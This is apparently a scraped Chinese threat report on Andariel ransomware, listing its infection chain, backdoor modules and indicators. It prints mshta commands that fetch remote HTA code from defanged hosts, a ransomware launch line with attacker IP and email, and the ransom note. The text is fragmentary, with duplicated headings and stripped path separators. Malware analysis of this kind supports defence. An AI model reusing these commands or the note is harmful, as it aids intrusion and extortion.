背景
背景
初始攻击或传播
初始攻击或传播
-
用户打开恶意文件,随后允许执行宏; -
出现一个弹出消息框; -
当前文件以HTML的形式保存到路径%temp%中,并相应地将所有图像文件分别存储在同一个目录中; -
显示诱饵文件; -
将 %temp%[document name]image003.png 转换为BMP文件格式,并添加扩展名.zip; -
使用mshta.exe执行image003.zip,它实际上包含HTML应用程序(HTA)代码; -
删除以前创建的临时文件;
-
"C:Program Files (x86)UnidocsezPDFReader2.0G......WindowsSystem32mshta.exe" "hxxp://www.jinjinpig.co[.]kr/AnyCss/skin.html" /print
-
"C:Program Files (x86)UnidocsezPDFReader2.0G......WindowsSystem32mshta.exe" "hxxp://adame.ypelec.co[.]kr/customize/ypelec/images/skin.html" /print
-
"C:Program Files (x86)UnidocsezPDFReader2.0G......WindowsSystem32mshta.exe" "hxxp://www.allamwith[.]com/home/css/skin.html" /print
-
"C:Program FilesUnidocsezPDFReader2.0G......WindowsSystem32mshta.exe" "hxxp://www.conkorea[.]com/cshop/skin/skin.html" /print
第二阶段有效载荷:简单代理
第二阶段有效载荷:简单代理
-
创建名为Microsoft32的互斥锁;
-
解析API地址:base64 decoding + RC4 decryption with the key MicrosoftCorporationValidation@#$%^&*()!US;
-
检索C2地址:base64解码+自定义XOR解密;
-
与 C2 通信;
第三阶段有效载荷:后门
第三阶段有效载荷:后门
-
sbiedll.dll:Sandboxie模块; -
api_log.dll:SunBelt Sandboxie模块; -
dir_watch.dll:SunBelt Sandboxie模块;
-
ModuleUpdate:用批处理文件替换当前模块; -
ModuleShell:执行 Windows 命令,更改工作目录,连接到给定的 IP 地址; -
ModuleFileManager:获取磁盘信息、文件列表、文件操作; -
ModuleScreenCapture:截屏;
勒索软件
勒索软件
-
c:tempmshelp.exe d: -s 23.229.111[.]197 3569 sanjgold847@protonmail[.]com 12345 12345FDDEE5566778899AABB
-
Attention! Attention! Attention! -
Your documents, photos, databases and other important files are encrypted and have the extension : [extension] -
Don't worry, you can return all your files! -
If you want to decrypt all your encrypted files, the only method of recovering files is to purchase decrypt tool and unique key for you. -
You just need little bitcoin. -
This software will decrypt all your encrypted files. -
To get this software you need write on our e - mail : [Attacker's email address] -
What gurantees do we give to you? -
It's just a business. We absolutely do not care about you and your deals, except getting benefits. -
You can send 2 your encrypted file from your PC with your ID and decrypt it for free. -
+ -- - Warning-- - + -
Don't try to change files by yourself, Don't use any third party software for restoring your data. -
You ID : [24 characters victim ID]
受害对象
受害对象
-
使用“netstat”命令检查网络连接时,两种情况都使用“-naop”选项和“tcp”; -
过滤结果,两种情况都使用“findstr”命令而不是“find”;
总结
总结
本文始发于微信公众号(关键基础设施安全应急响应中心):Andariel 组织开发的勒索软件又开始兴风作浪了
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论